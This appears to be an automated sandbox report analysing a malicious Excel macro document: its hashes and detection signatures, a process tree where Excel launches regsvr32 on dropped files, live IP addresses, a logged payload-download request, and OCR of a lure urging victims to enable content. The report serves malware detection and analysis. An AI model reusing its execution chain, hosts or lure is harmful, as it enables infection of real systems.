Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-40776837-06252021.xlsm

Overview

General Information

Sample Name:Permission-40776837-06252021.xlsm
Analysis ID:440654
MD5:2cd2fd004b5589a595239f202ac648ae
SHA1:ac02da8a953fd89f325c64bf5df93e415350ec12
SHA256:ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 3508 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3120 cmdline: regsvr32 ..\Kro.fis MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4640 cmdline: regsvr32 ..\Kro.fis1 MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4688 cmdline: regsvr32 ..\Kro.fis2 MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3508, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 3120

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.3:49729 -> 185.183.99.120:80
Source: global trafficTCP traffic: 192.168.2.3:49710 -> 185.240.103.219:80
Source: Joe Sandbox ViewIP Address: 190.14.37.3 190.14.37.3
Source: Joe Sandbox ViewIP Address: 185.183.99.120 185.183.99.120
Source: Joe Sandbox ViewIP Address: 185.240.103.219 185.240.103.219
Source: global trafficHTTP traffic detected: GET /44372.78513125.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: global trafficHTTP traffic detected: GET /44372.78513125.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.120Connection: Keep-Alive
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.aadrm.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.office.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.onedrive.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://augloop.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cdn.entity.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://clients.config.office.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://config.edge.skype.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cortana.ai/api
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://cr.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dev.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://devnull.onenote.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://directory.services.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://graph.windows.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://graph.windows.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://lifecycle.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://login.windows.local
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://management.azure.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://management.azure.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://messaging.office.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ncus.contentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://officeapps.live.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://onedrive.live.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://osi.office.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://outlook.office.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://outlook.office365.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://settings.outlook.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://staging.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://tasks.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://wus2.contentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the ' yellow bar above. 21 ) :: PROTECTED VIEW Be careful-files from the Int
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the ' yellow bar above. 21 ) 22_ PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Screenshot number: 12Screenshot OCR: Enable Content Sheet1 CD Ready O Type here to search i 1 El a a g xg 191 m m I i '00% ^ E2 g
